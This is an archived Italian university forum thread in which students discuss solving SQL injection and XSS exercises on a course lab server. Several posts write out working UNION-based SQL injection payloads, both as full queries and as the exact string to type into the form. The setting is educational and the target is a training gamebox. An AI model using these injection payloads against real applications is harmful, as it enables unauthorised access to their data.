.dsy:it. - Sicurezza - Esercizi Sicurezza - Attacchi Web II PARTE

Il progetto dsy.it è l'unofficial support site dei corsi di laurea del Dipartimento di Scienze dell'Informazione e del Dipartimento di Informatica e Comunicazione della Statale di Milano. E' un servizio degli studenti per gli studenti, curato in modo no-profit da un gruppo di essi. I nostri servizi comprendono aree di discussione per ogni Corso di Laurea, un'area download per lo scambio file, una raccolta di link e un motore di ricerca, il supporto agli studenti lavoratori, il forum hosting per Professori e studenti, i blog, e molto altro...
In questa sezione è indicizzato in textonly il contenuto del nostro forum

.dsy:it. Archive > Didattica > Corsi N - Z > Sicurezza

Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011
Clicca QUI per vedere il messaggio nel forum

gennaro

Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web

http://gamebox.laser.dico.unimi.it/sec2/web2/index.html

sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?

zack1988

Risolti i vari problemi sull'SQL Injection, non sono complicati, cercando un pó in rete ho visto che si puó usare l'istruzione UNION di SQL per bypassare la query:

Es: sqli2
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';

Es: sqli3
SELECT counter, concorrente FROM sqli3 WHERE counter=999 UNION SELECT concorrente, squadra FROM sqli3 WHERE classificato=1;

Es: sqli4
SELECT counter, concorrente FROM sqli4 LIMIT 0, 0 UNION SELECT concorrente, squadra FROM sqli4 WHERE classificato=1

zack1988

Si poteva risolvere in un'altro modo findendo la query:
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX';
e di seguito inserire la propria query
SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';

Ma non so perché da console sql tutto ok, nella form invece continua a darmi un errore sulla sintassi SQL.

gennaro

zack quelle query le scrivi nello spazio apposta o nell'url o da qualche altra parte? perchè ho provato ma nn me ne funziona neanche uno di quelli che hai scritto O_o
p.s. a meno che debba usare burp, cosa ke odio e che quindi non uso mai :D

zack1988

No devi scrivere solo una parte :
Es SQLI2
Nella pagina c'è scritto SQL query: SELECT counter, concorrente FROM sqli2 WHERE concorrente=''

e bisogna completarlo inserendo nella form:
XXXXXXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1

e quando premi invio si nota vedi la query che ho scritto nel post precedente.

Gli altri es sono uguali tranne che non hai una form ma devi inviare una POST.

Spero di essere stato chiaro

gennaro

spiegazione impeccabile! grazie mille!

simoki

Originally posted by gennaro
Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web

http://gamebox.laser.dico.unimi.it/sec2/web2/index.html

sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?

Recipes e Marmot Memo (con una delle due varianti) superati.
per gli altri ancora niente..

gennaro

non ho ancora dato un'occhiata a tutti questi livelli
si tratta sempre di SQL injection e XXS o come negli altri bisogna guardare codice sorgente, script cookie, etc?

gennaro

come hai fatto a fare quei due livelli?? non riesco proprio a riuscirci (in particolare Marmot Memo, sto impazzendo!!! XD)

MarcoVigna17

ma gli ultimi esercizi, con che modalità si risolvono???